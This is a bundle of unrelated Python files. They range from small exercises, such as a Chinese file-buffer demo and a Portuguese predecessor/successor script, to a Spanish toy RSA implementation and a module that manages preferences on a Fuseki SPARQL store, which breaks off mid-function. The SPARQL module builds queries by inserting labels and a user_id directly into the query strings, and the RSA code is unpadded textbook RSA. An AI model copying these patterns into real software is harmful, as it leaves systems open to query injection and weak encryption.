import time
f = open("D:/test/缓冲区处理.txt","w+")
f.write("python中缓冲区的处理")
f.close() #调用close方法,文件缓冲区清空,内容写到文件中,关闭文件
#-------------------------------------------------------------------
f2 = open("D:/test/缓冲区处理.txt","w+")
f2.write("第二次操作缓冲区处理.txt文件,之后我要进行flush操作,然后再写入一句话\n")
f2.flush() #执行完flush操作去查看文件,文件内容已经写入,此时缓冲区还是有内容
time.sleep(1) #让程序暂停十秒,以便去插卡flush操作之后文件内容是否已经写入
f2.write("第一次查看文件是,没有这句话,close操作之后才有")
f2.close()
#--------------------------------------------------------------------
f3 = open("D:/test/缓冲区处理.txt","w+")
f3.write("helloworld!!!\n")
f3.write("helloworld!!!\n")
f3.write("helloworld!!!\n")
f3.write("helloworld!!!\n") #写操作写完后,指针位置在文件结尾
f3.flush() #将内容写入文件
f3.seek(0)
#read操作是从指针开始位置读取文件内容,如果没有将指针位置重新指向文件开头,则读取不到文件内容
print(f3.read())
f3.close()
|
# Read an integer and print its predecessor and successor.
num = int(input('digite u numero: '))
print(f'o antecessor de {num} é {num - 1}')
print(f'e o sucessor é {num + 1}')
#!/usr/bin/python3
# Script that fetches an URL
import urllib.request
print("Body response:")
with urllib.request.urlopen('https://intranet.hbtn.io/status') as response:
body = response.read()
print("\t- type: {}".format(type(response.read())))
print("\t- content: {}".format(body))
print("\t- utf8 content: {}".format(body.decode('utf-8')))
response.close()
|
class XcomError(Exception):
    """Base class for all Xcom protocol errors.

    thrower -- optional reference to the object that raised the error,
               kept for diagnostic context.
    """
    def __init__(self, message = '', thrower = None):
        super().__init__(message)
        self.thrower = thrower
class ParseError(XcomError):
    """Raised when an incoming frame cannot be parsed."""
    pass
class ResponseError(XcomError):
    """Raised when a response is malformed or unexpected."""
    pass
class StatusError(XcomError):
    """Raised when a reply carries an error status code."""
    pass
class ClientTimeoutError(XcomError):
    """Raised when the client does not answer within the timeout."""
    pass
class CommunicationError(XcomError):
    """Raised on lower-level transport/communication failures."""
    pass
class EndOfConfig(XcomError):
    """Signals that the end of the configuration stream was reached."""
    pass
# Full set of ticker-info keys (Yahoo-Finance-style `info` fields) that this
# module knows about; subsets for scanning are defined below.
col_list = [
    'symbol',
    'zip',
    'sector',
    'fullTimeEmployees',
    'longBusinessSummary',
    'city',
    'phone',
    'state',
    'country',
    'companyOfficers',
    'website',
    'maxAge',
    'address1',
    'fax',
    'industry',
    'address2',
    'ebitdaMargins',
    'profitMargins',
    'grossMargins',
    'operatingCashflow',
    'revenueGrowth',
    'operatingMargins',
    'ebitda',
    'targetLowPrice',
    'recommendationKey',
    'grossProfits',
    'freeCashflow',
    'targetMedianPrice',
    'currentPrice',
    'earningsGrowth',
    'currentRatio',
    'returnOnAssets',
    'numberOfAnalystOpinions',
    'targetMeanPrice',
    'debtToEquity',
    'returnOnEquity',
    'targetHighPrice',
    'totalCash',
    'totalDebt',
    'totalRevenue',
    'totalCashPerShare',
    'financialCurrency',
    'revenuePerShare',
    'quickRatio',
    'recommendationMean',
    'exchange',
    'shortName',
    'longName',
    'exchangeTimezoneName',
    'exchangeTimezoneShortName',
    'isEsgPopulated',
    'gmtOffSetMilliseconds',
    'underlyingSymbol',
    'quoteType',
    'underlyingExchangeSymbol',
    'headSymbol',
    'messageBoardId',
    'uuid',
    'market',
    'annualHoldingsTurnover',
    'enterpriseToRevenue',
    'beta3Year',
    'enterpriseToEbitda',
    '52WeekChange',
    'morningStarRiskRating',
    'forwardEps',
    'revenueQuarterlyGrowth',
    'sharesOutstanding',
    'fundInceptionDate',
    'annualReportExpenseRatio',
    'totalAssets',
    'bookValue',
    'sharesShort',
    'sharesPercentSharesOut',
    'fundFamily',
    'lastFiscalYearEnd',
    'heldPercentInstitutions',
    'netIncomeToCommon',
    'trailingEps',
    'lastDividendValue',
    'SandP52WeekChange',
    'priceToBook',
    'heldPercentInsiders',
    'nextFiscalYearEnd',
    'yield',
    'mostRecentQuarter',
    'shortRatio',
    'sharesShortPreviousMonthDate',
    'floatShares',
    'beta',
    'enterpriseValue',
    'priceHint',
    'threeYearAverageReturn',
    'lastSplitDate',
    'lastSplitFactor',
    'legalType',
    'morningStarOverallRating',
    'earningsQuarterlyGrowth',
    'priceToSalesTrailing12Months',
    'dateShortInterest',
    'pegRatio',
    'ytdReturn',
    'forwardPE',
    'lastCapGain',
    'shortPercentOfFloat',
    'sharesShortPriorMonth',
    'category',
    'fiveYearAverageReturn',
    'previousClose',
    'regularMarketOpen',
    'twoHundredDayAverage',
    'trailingAnnualDividendYield',
    'payoutRatio',
    'volume24Hr',
    'regularMarketDayHigh',
    'navPrice',
    'averageDailyVolume10Day',
    'regularMarketPreviousClose',
    'fiftyDayAverage',
    'trailingAnnualDividendRate',
    'open',
    'averageVolume10days',
    'expireDate',
    'algorithm',
    'dividendRate',
    'exDividendDate',
    'circulatingSupply',
    'startDate',
    'regularMarketDayLow',
    'currency',
    'trailingPE',
    'regularMarketVolume',
    'lastMarket',
    'maxSupply',
    'openInterest',
    'marketCap',
    'volumeAllCurrencies',
    'strikePrice',
    'averageVolume',
    'dayLow',
    'ask',
    'askSize',
    'volume',
    'fiftyTwoWeekHigh',
    'fromCurrency',
    'fiveYearAvgDividendYield',
    'fiftyTwoWeekLow',
    'bid',
    'tradeable',
    'dividendYield',
    'bidSize',
    'dayHigh',
    'regularMarketPrice',
    'logo_url',
    'quoteSourceName',
    'averageDailyVolume3Month',
    'regularMarketTime',
    'regularMarketChange',
    'preMarketPrice',
    'exchangeDataDelayedBy',
    'postMarketChange',
    'postMarketPrice',
    'exchangeName',
    'preMarketChange',
    'regularMarketSource',
    'marketState',
    ]
# Minimal scanning subset of col_list; commented entries are intentionally
# disabled and kept for easy re-enabling.
scan_col_list = [
    'symbol',
    'sector',
    'industry',
    # 'ebitdaMargins',
    # 'profitMargins',
    # 'grossMargins',
    # 'operatingCashflow',
    # 'revenueGrowth',
    # 'operatingMargins',
    # 'ebitda',
    # 'targetLowPrice',
    # 'recommendationKey',
    # 'grossProfits',
    # 'freeCashflow',
    # 'targetMedianPrice',
    # 'currentPrice',
    # 'earningsGrowth',
    # 'currentRatio',
    # 'returnOnAssets',
    # 'numberOfAnalystOpinions',
    # 'targetMeanPrice',
    # 'debtToEquity',
    # 'returnOnEquity',
    # 'targetHighPrice',
    # 'totalCash',
    # 'totalDebt',
    # 'totalRevenue',
    # 'totalCashPerShare',
    # 'financialCurrency',
    # 'revenuePerShare',
    # 'quickRatio',
    # 'recommendationMean',
    # 'shortName',
    # 'longName',
    # 'isEsgPopulated',
    # 'market',
    # 'annualHoldingsTurnover',
    # 'enterpriseToRevenue',
    # 'beta3Year',
    # 'enterpriseToEbitda',
    # '52WeekChange',
    # 'morningStarRiskRating',
    # 'forwardEps',
    # 'revenueQuarterlyGrowth',
    # 'sharesOutstanding',
    # 'annualReportExpenseRatio',
    # 'totalAssets',
    # 'bookValue',
    # 'sharesShort',
    # 'sharesPercentSharesOut',
    # 'fundFamily',
    # 'heldPercentInstitutions',
    # 'netIncomeToCommon',
    # 'trailingEps',
    # 'lastDividendValue',
    # 'SandP52WeekChange',
    # 'priceToBook',
    # 'heldPercentInsiders',
    # 'yield',
    # 'shortRatio',
    # 'sharesShortPreviousMonthDate',
    # 'floatShares',
    # 'beta',
    # 'enterpriseValue',
    # 'priceHint',
    # 'threeYearAverageReturn',
    # 'lastSplitDate',
    # 'lastSplitFactor',
    # 'legalType',
    # 'morningStarOverallRating',
    # 'earningsQuarterlyGrowth',
    # 'priceToSalesTrailing12Months',
    # 'dateShortInterest',
    # 'pegRatio',
    # 'ytdReturn',
    # 'forwardPE',
    # 'lastCapGain',
    # 'shortPercentOfFloat',
    # 'sharesShortPriorMonth',
    # 'category',
    # 'fiveYearAverageReturn',
    # 'previousClose',
    # 'regularMarketOpen',
    # 'twoHundredDayAverage',
    # 'trailingAnnualDividendYield',
    # 'payoutRatio',
    # 'volume24Hr',
    # 'regularMarketDayHigh',
    # 'navPrice',
    # 'averageDailyVolume10Day',
    # 'regularMarketPreviousClose',
    # 'fiftyDayAverage',
    # 'trailingAnnualDividendRate',
    # 'open',
    # 'averageVolume10days',
    # 'expireDate',
    # 'algorithm',
    # 'dividendRate',
    # 'exDividendDate',
    # 'circulatingSupply',
    # 'startDate',
    # 'regularMarketDayLow',
    # 'trailingPE',
    # 'regularMarketVolume',
    # 'lastMarket',
    # 'maxSupply',
    # 'openInterest',
    # 'marketCap',
    # 'volumeAllCurrencies',
    # 'strikePrice',
    # 'averageVolume',
    # 'dayLow',
    # 'ask',
    # 'askSize',
    # 'volume',
    # 'fiftyTwoWeekHigh',
    # 'fromCurrency',
    # 'fiveYearAvgDividendYield',
    # 'fiftyTwoWeekLow',
    # 'bid',
    'tradeable',
    # 'dividendYield',
    # 'bidSize',
    # 'dayHigh',
    # 'regularMarketPrice',
    # 'quoteSourceName',
    # 'averageDailyVolume3Month',
    # 'regularMarketTime',
    # 'regularMarketChange',
    # 'preMarketPrice',
    # 'exchangeDataDelayedBy',
    # 'postMarketChange',
    # 'postMarketPrice',
    # 'exchangeName',
    # 'preMarketChange',
    # 'regularMarketSource',
    # 'marketState',
    ]
# Yahoo-Finance "info" keys retained for the second scan pass; the
# commented-out entries are known keys that are deliberately excluded.
scan_col_list_2 = [
    'symbol',
    # 'zip',
    'sector',
    # 'fullTimeEmployees',
    # 'longBusinessSummary',
    # 'city',
    # 'phone',
    # 'state',
    # 'country',
    # 'companyOfficers',
    # 'website',
    # 'maxAge',
    # 'address1',
    # 'fax',
    'industry',
    # 'address2',
    'ebitdaMargins',
    'profitMargins',
    'grossMargins',
    'operatingCashflow',
    'revenueGrowth',
    'operatingMargins',
    'ebitda',
    'targetLowPrice',
    'recommendationKey',
    'grossProfits',
    'freeCashflow',
    'targetMedianPrice',
    'currentPrice',
    'earningsGrowth',
    'currentRatio',
    'returnOnAssets',
    'numberOfAnalystOpinions',
    'targetMeanPrice',
    'debtToEquity',
    'returnOnEquity',
    'targetHighPrice',
    'totalCash',
    'totalDebt',
    'totalRevenue',
    'totalCashPerShare',
    'financialCurrency',
    'revenuePerShare',
    'quickRatio',
    'recommendationMean',
    # 'exchange',
    'shortName',
    'longName',
    # 'exchangeTimezoneName',
    # 'exchangeTimezoneShortName',
    'isEsgPopulated',
    # 'gmtOffSetMilliseconds',
    # 'underlyingSymbol',
    # 'quoteType',
    # 'underlyingExchangeSymbol',
    # 'headSymbol',
    # 'messageBoardId',
    # 'uuid',
    'market',
    'annualHoldingsTurnover',
    'enterpriseToRevenue',
    'beta3Year',
    'enterpriseToEbitda',
    '52WeekChange',
    'morningStarRiskRating',
    'forwardEps',
    'revenueQuarterlyGrowth',
    'sharesOutstanding',
    # 'fundInceptionDate',
    'annualReportExpenseRatio',
    'totalAssets',
    'bookValue',
    'sharesShort',
    'sharesPercentSharesOut',
    'fundFamily',
    # 'lastFiscalYearEnd',
    'heldPercentInstitutions',
    'netIncomeToCommon',
    'trailingEps',
    'lastDividendValue',
    'SandP52WeekChange',
    'priceToBook',
    'heldPercentInsiders',
    # 'nextFiscalYearEnd',
    'yield',
    # 'mostRecentQuarter',
    'shortRatio',
    'sharesShortPreviousMonthDate',
    'floatShares',
    'beta',
    'enterpriseValue',
    'priceHint',
    'threeYearAverageReturn',
    'lastSplitDate',
    'lastSplitFactor',
    'legalType',
    'morningStarOverallRating',
    'earningsQuarterlyGrowth',
    'priceToSalesTrailing12Months',
    'dateShortInterest',
    'pegRatio',
    'ytdReturn',
    'forwardPE',
    'lastCapGain',
    'shortPercentOfFloat',
    'sharesShortPriorMonth',
    'category',
    'fiveYearAverageReturn',
    'previousClose',
    'regularMarketOpen',
    'twoHundredDayAverage',
    'trailingAnnualDividendYield',
    'payoutRatio',
    'volume24Hr',
    'regularMarketDayHigh',
    'navPrice',
    'averageDailyVolume10Day',
    'regularMarketPreviousClose',
    'fiftyDayAverage',
    'trailingAnnualDividendRate',
    'open',
    'averageVolume10days',
    'expireDate',
    'algorithm',
    'dividendRate',
    'exDividendDate',
    'circulatingSupply',
    'startDate',
    'regularMarketDayLow',
    # 'currency',
    'trailingPE',
    'regularMarketVolume',
    'lastMarket',
    'maxSupply',
    'openInterest',
    'marketCap',
    'volumeAllCurrencies',
    'strikePrice',
    'averageVolume',
    'dayLow',
    'ask',
    'askSize',
    'volume',
    'fiftyTwoWeekHigh',
    'fromCurrency',
    'fiveYearAvgDividendYield',
    'fiftyTwoWeekLow',
    'bid',
    'tradeable',
    'dividendYield',
    'bidSize',
    'dayHigh',
    'regularMarketPrice',
    # 'logo_url',
    'quoteSourceName',
    'averageDailyVolume3Month',
    'regularMarketTime',
    'regularMarketChange',
    'preMarketPrice',
    'exchangeDataDelayedBy',
    'postMarketChange',
    'postMarketPrice',
    'exchangeName',
    'preMarketChange',
    'regularMarketSource',
    'marketState',
]
|
import random
from random import randint
from decimal import *
# Plaintext symbol set: lowercase Latin alphabet, indices 0-25.
abecedario = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
# Alphabet size; also the numeric base used when packing letters into blocks.
tam = 26;
def exponente(y, b, mod):
    """Modular exponentiation: return (y ** b) % mod by square-and-multiply.

    Fixes: ``b = b/2`` was true division, which turns ``b`` into a float in
    Python 3 and silently loses precision for exponents above 2**53; it now
    uses integer division.  The loop also runs while ``b >= 1`` so that an
    initial exponent of 1 returns ``y % mod`` instead of 1.
    """
    x = 1
    while b >= 1:
        if b % 2 == 0:
            # Even exponent: square the base, halve the exponent.
            y = (y ** 2) % mod
            b //= 2
        if b % 2 == 1:
            # Odd exponent: fold one factor of y into the accumulator.
            b -= 1
            x = (x * y) % mod
    return x
def in_p():
    """Prompt the user for the prime p and return it as an int."""
    w = input("------Introduzca p: ")
    return int(w)

def encontrar_indice(a):
    """Return the 0-based index of letter ``a`` in ``abecedario``.

    Fixed: this helper was nested inside ``in_p``, so the module-level
    ``RSA`` function could not call it (NameError); both functions are now
    top-level and ``in_p`` returns its parsed input as originally intended.
    Returns None implicitly when ``a`` is not in the alphabet.
    """
    for i in range(0, tam):
        if abecedario[i] == a:
            return i
def in_cadena():
    """Prompt for the plaintext string and return it unchanged."""
    return input("------Introduzca cadena: ")
def in_q():
    """Prompt for the prime q and return it as an int."""
    return int(input("------Introduzca q: "))
def mcd(m, n):
    """Greatest common divisor of m and n (Euclid); coprime iff result is 1."""
    while m % n != 0:
        m, n = n, m % n
    return n
#SON COPRIMOS SI EL MCD es 1
def primo(n):
    """Return 1 if n is prime, 0 otherwise (int results kept for callers).

    Rewritten from counting every divisor in 1..n (O(n)) to trial division
    up to sqrt(n); results are identical for every integer input, including
    n < 2, which is never prime.
    """
    if n < 2:
        return 0
    i = 2
    while i * i <= n:
        if n % i == 0:
            return 0
        i += 1
    return 1
def lehman(n, l):
    """Lehmann probabilistic primality test with l-1 random rounds.

    Returns 0 when n is judged (probably) prime and nonzero when a
    compositeness witness is found -- callers treat ``!= 0`` as "reject".

    Fixed: the exponent ``(n-1)/2`` was computed with true division (a
    float in Python 3), losing precision for large n; it now uses ``//``.
    """
    comp = 0
    b = []
    for it in range(1, l):
        a = random.randint(1, n - 1)
        # For prime n, a**((n-1)//2) mod n must be 1 or n-1 (Euler's criterion).
        c = exponente(a, (n - 1) // 2, n)
        if (c != 1) and (c != n - 1):
            # Definite witness of compositeness.
            return 1
        else:
            b.insert(it, c)
    # If every round produced 1 the test also rejects (all-ones is
    # improbable for a true prime).
    # NOTE(review): the scan starts at index 1, so b[0] is never examined --
    # quirk preserved from the original implementation.
    for it in range(1, len(b)):
        if b[int(it)] != 1:
            comp = 1
    if comp == 1:
        return 0
    else:
        return 1
def ecluides(a, b):
    """Iterative Euclidean algorithm; returns gcd(a, b)."""
    while b != 0:
        a, b = b, a % b
    return a
def calcular_j(base, n):
    """Largest exponent j with base ** j < n, i.e. the block size for modulus n."""
    j = 0
    while base ** j < n:
        j += 1
    return j - 1
def calcular_bloques(vector_cadena, j, base):
    """Pack the digit list into numeric blocks of j digits, big-endian in ``base``.

    Example: [1, 2, 3, 4] with j=2, base=10 -> [12, 34].
    """
    bloques = []
    i = 0
    limite = len(vector_cadena) - 1
    while i < limite:
        valor = 0
        # Consume j digits, most-significant first.
        for aux in range(j - 1, -1, -1):
            valor += vector_cadena[i] * (base ** aux)
            i += 1
        bloques.append(valor)
    return bloques
def cifrar(vector, e, n):
    """RSA-encrypt each block: c_i = vector[i] ** e mod n.

    Uses three-argument ``pow`` so the modular reduction happens during
    exponentiation instead of materialising the huge intermediate value
    ``vector[i] ** e``; results are identical for non-negative ints.
    """
    return [pow(bloque, e, n) for bloque in vector]
def inver(a, n):
    """Modular inverse of ``a`` mod ``n`` via the extended Euclidean algorithm.

    Returns the inverse in [0, n); returns the string
    "a is not invertible" when gcd(a, n) != 1 (behaviour preserved).
    """
    t, newt = 0, 1
    r, newr = n, a
    while newr != 0:
        quotient = int(r / newr)
        t, newt = newt, t - quotient * newt
        r, newr = newr, r - quotient * newr
    if r > 1:
        return "a is not invertible"
    if t < 0:
        t = t + n
    return t
def RSA(p, q, d):
    """Interactive RSA encryption driver.

    Validates that p and q pass the Lehmann primality test and that d is
    coprime with phi(n) = (p-1)(q-1), reads a plaintext from stdin, packs
    it into numeric blocks, derives the public exponent e = d^-1 mod phi(n)
    and prints the encrypted block list.  Returns -1 on validation failure.
    """
    # lehman() returns 0 for "probably prime"; anything else rejects.
    if(lehman(p,35) != 0):
        print("p");
        return -1;
    if(lehman(q,35) != 0):
        print("q");
        return -1;
    On = (p-1)*(q-1);  # Euler's totient of n = p*q
    n = p*q
    # d must be coprime with phi(n) to be invertible.
    if(ecluides(d,On) != 1):
        print("ecluides");
        return -1;
    cadena = in_cadena();
    vector_cadena = [];
    # Map each non-space character to its alphabet index.
    for i in range (0,len(cadena)):
        if(cadena[i] != " "):
            vector_cadena += [encontrar_indice(cadena[i].lower())];
    vector_bloques = calcular_bloques(vector_cadena,calcular_j(tam,n),tam);
    e = inver(d,On);  # public exponent: inverse of d mod phi(n)
    vector_cifrado = []
    vector_cifrado = cifrar(vector_bloques,e,n);
    print(vector_cifrado);
#RSA(421,7,1619);
#RSA(421,7,1619);
#print(mcd(4,5));
#print(inver(1619,2520))
#calcular_j(26,2947);
#print(calcular_bloques([12,0,12,0,12,0],2,26));
|
# Toy housing dataset: land area (tanah), building area (bangunan), distance
# to the city centre (jarak_ke_pusat) and price (harga) -- all stored as strings.
lod = [{'tanah': '70', 'bangunan': '50', 'jarak_ke_pusat': '15', 'harga': '500'}, {'tanah': '70', 'bangunan': '60', 'jarak_ke_pusat': '30', 'harga': '400'}, {'tanah': '70', 'bangunan': '60', 'jarak_ke_pusat': '55', 'harga': '300'}, {'tanah': '100', 'bangunan': '50', 'jarak_ke_pusat': '30', 'harga': '700'}, {'tanah': '100', 'bangunan': '70', 'jarak_ke_pusat': '25', 'harga': '1000'}, {'tanah': '100', 'bangunan': '70', 'jarak_ke_pusat': '50', 'harga': '650'}, {'tanah': '120', 'bangunan': '100', 'jarak_ke_pusat': '20', 'harga': '2000'}, {'tanah': '120', 'bangunan': '80', 'jarak_ke_pusat': '50', 'harga': '1200'}, {'tanah': '150', 'bangunan': '100', 'jarak_ke_pusat': '50', 'harga': '1800'}, {'tanah': '150', 'bangunan': '90', 'jarak_ke_pusat': '15', 'harga': '3000'}]
def min_value(list_attributes):
    """Return the element of ``list_attributes`` with the smallest numeric value.

    ``list_attributes`` holds numeric strings.  Fixed: the original stored
    the *string* back into the running minimum and then compared
    ``int(attr) < min_attribute`` against it, which raises TypeError in
    Python 3 after the first assignment.  The running minimum is now
    tracked as an int while the original string element is returned.
    Returns 9999 when the list is empty (behaviour preserved).
    """
    min_num = 9999
    min_attribute = 9999
    for attr in list_attributes:
        if int(attr) < min_num:
            min_num = int(attr)
            min_attribute = attr
    return min_attribute
# Demo: pick the smallest land-area value from the dataset above.
d = min_value(['70', '70', '70', '100', '100', '100', '120', '120', '150', '150'])
print(d)
|
import json
import uuid
import hashlib
from SPARQLWrapper import SPARQLWrapper, JSON, CSV
from collections import Counter
def get_preferences():
    """Return every stored DB preference keyed by human-readable label.

    Shape: ``{label: {'views': str, 'user_ids': [str, ...]}}``.
    Values come back from Fuseki as CSV, so 'views' stays a string.
    """
    # tag -> label mapping, used to translate the URIs in the result rows.
    db_labels = get_db_labels(reversed=True)
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/")
    query = """
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
    SELECT ?db ?user_id ?views
    WHERE {
        ?db rdf:type preferences:Preference .
        optional {
            ?db preferences:views_count ?views .
        }
        optional {
            ?db preferences:users ?user .
            ?user users:user_id ?user_id .
        }
    }
    """
    fuseki_client.setQuery(query)
    fuseki_client.method = "POST"
    fuseki_client.setReturnFormat(CSV)
    results = fuseki_client.query().convert()
    prefs = {}
    # Skip the CSV header; each row is "<pref-uri>,<user-id>,<views>".
    for line in results.decode('utf-8').strip().split('\r\n')[1:]:
        label, uid, views = line.split(',')
        # Strip the ontology namespace, then map tag -> display label.
        label = label.rsplit('#', 1)[-1]
        label = db_labels[label]
        if label not in prefs:
            prefs[label] = {
                'views': views,
                'user_ids': []
            }
        if len(uid) > 0:
            prefs[label]['user_ids'].append(uid)
    return prefs
def get_db_labels(reversed=False):
    """Fetch all known database-management systems from the ``dbs`` dataset.

    Returns ``{label: tag}`` by default, or ``{tag: label}`` when
    ``reversed`` is True.  (NOTE(review): the parameter shadows the builtin
    ``reversed``; kept because it is part of the public signature.)
    """
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/dbs/")
    query = """
    PREFIX : <http://www.semanticweb.org/ontologies/databases/tbox/>
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
    SELECT * WHERE {
        ?x a :DatabaseManagementSystem ;
        rdfs:label ?label
    }
    """
    fuseki_client.setQuery(query)
    fuseki_client.method = "POST"
    fuseki_client.setReturnFormat(CSV)
    results = fuseki_client.query().convert()
    prefs = {}
    # Skip the CSV header; each row is "<dbms-uri>,<label>".
    for line in results.decode('utf-8').strip().split('\r\n')[1:]:
        tag, label = line.split(',')
        if reversed:
            prefs[tag.rsplit('/', 1)[-1]] = label
        else:
            prefs[label] = tag.rsplit('/', 1)[-1]
    return prefs
def insert_preference(label, views_count=0):
    """Create a Preference individual for ``label`` with an initial view count.

    No-op returning False when the label is not a supported DB or the
    preference already exists; returns True after a successful insert.
    """
    supported_dbs = get_db_labels()
    pref = get_preference(label)
    if label not in supported_dbs or pref is not None:
        return False
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
    query = """
    PREFIX : <http://www.semanticweb.org/ontologies/databases/tbox/>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
    INSERT DATA {
        preferences:%s rdf:type preferences:Preference ;
        preferences:database_id :%s ;
        preferences:views_count %d
    }
    """ % (supported_dbs[label], supported_dbs[label], views_count)
    fuseki_client.setQuery(query)
    fuseki_client.queryType = "INSERT"
    fuseki_client.method = "POST"
    fuseki_client.query()
    return True
def delete_preference(label):
    """Delete the Preference individual (all its triples) for ``label``.

    Returns False when the label is not a known DB, True otherwise.
    """
    db_labels = get_db_labels()
    if label not in db_labels:
        return False
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
    query = """
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    DELETE WHERE {
        preferences:%s a preferences:Preference ;
        ?property ?value
    }
    """ % db_labels[label]
    fuseki_client.setQuery(query)
    fuseki_client.queryType = "DELETE"
    fuseki_client.method = "POST"
    fuseki_client.query()
    return True
def get_preference(label):
    """Fetch a single preference by DB label.

    Returns ``{'views_count': str, 'user_ids': [str, ...]}`` or None when
    the label is unknown or no Preference individual exists.
    """
    db_labels = get_db_labels()
    if label not in db_labels:
        return None
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/")
    query = """
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    SELECT ?ctr ?val
    WHERE {
        preferences:%s a preferences:Preference .
        optional {
            preferences:%s preferences:views_count ?ctr .
        }
        optional {
            preferences:%s preferences:users ?user .
            ?user users:user_id ?val
        }
    }
    """ % (db_labels[label], db_labels[label], db_labels[label])
    fuseki_client.setQuery(query)
    fuseki_client.method = "POST"
    fuseki_client.setReturnFormat(CSV)
    results = fuseki_client.query().convert()
    pref = {}
    # Rows share the same views_count; user ids vary per row.
    for idx, line in enumerate(results.decode('utf-8').strip().split('\r\n')[1:]):
        views_count, user = line.split(',')
        if idx == 0:
            pref['views_count'] = views_count
            pref['user_ids'] = [user] if len(user) > 0 else []
        else:
            pref['user_ids'].append(user)
    # No data rows at all means the Preference individual does not exist.
    if len(pref) == 0:
        return None
    return pref
def add_user_preference(preference_label, user_id):
    """Attach the user identified by ``user_id`` to a database preference.

    Creates the Preference individual first when it does not exist yet
    (``insert_preference`` is a no-op otherwise).  Fixed: unknown labels
    now return False like the other mutators in this module, instead of
    raising KeyError on the ``db_label[preference_label]`` lookup.
    """
    db_label = get_db_labels()
    # Guard unknown labels, consistent with delete/remove/update siblings.
    if preference_label not in db_label:
        return False
    insert_preference(preference_label)
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
    query = """
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
    INSERT {
        preferences:%s preferences:users ?s .
    }
    WHERE {
        ?s rdf:type users:User .
        ?s users:user_id "%s" .
    }
    """ % (db_label[preference_label], user_id)
    fuseki_client.setQuery(query)
    fuseki_client.queryType = "INSERT"
    fuseki_client.method = "POST"
    fuseki_client.query()
    return True
def remove_user_preference(preference_label, user_id):
    """Detach the user with ``user_id`` from the preference for ``preference_label``.

    Returns False when the label is not a known DB, True otherwise.
    """
    db_labels = get_db_labels()
    if preference_label not in db_labels:
        return False
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
    query = """
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    DELETE {
        preferences:%s preferences:users ?x
    }
    WHERE {
        ?x users:user_id "%s"
    }
    """ % (db_labels[preference_label], user_id)
    fuseki_client.setQuery(query)
    fuseki_client.queryType = "DELETE"
    fuseki_client.method = "POST"
    fuseki_client.query()
    return True
def update_preference(label, views_count):
    """Overwrite the ``views_count`` of the preference for ``label``.

    Implemented as DELETE-then-INSERT of the views_count triple.  Fixed:
    both updates were sent to the read endpoint ``/v2/`` instead of the
    SPARQL update endpoint ``/v2/update`` used by every other mutator in
    this module.  Returns False for unknown labels, True otherwise.
    """
    db_labels = get_db_labels()
    if label not in db_labels:
        return False
    # Update endpoint (was "/v2/", the query endpoint, which cannot accept
    # SPARQL Update operations).
    fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
    query = """
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    DELETE WHERE {
        preferences:%s preferences:views_count ?x
    }
    """ % db_labels[label]
    fuseki_client.setQuery(query)
    fuseki_client.queryType = "DELETE"
    fuseki_client.method = "POST"
    fuseki_client.query()
    query = """
    PREFIX users: <http://www.semanticweb.org/ontologies/users#>
    PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
    PREFIX owl: <http://www.w3.org/2002/07/owl#>
    PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
    INSERT DATA {
        preferences:%s preferences:views_count %d
    }
    """ % (db_labels[label], views_count)
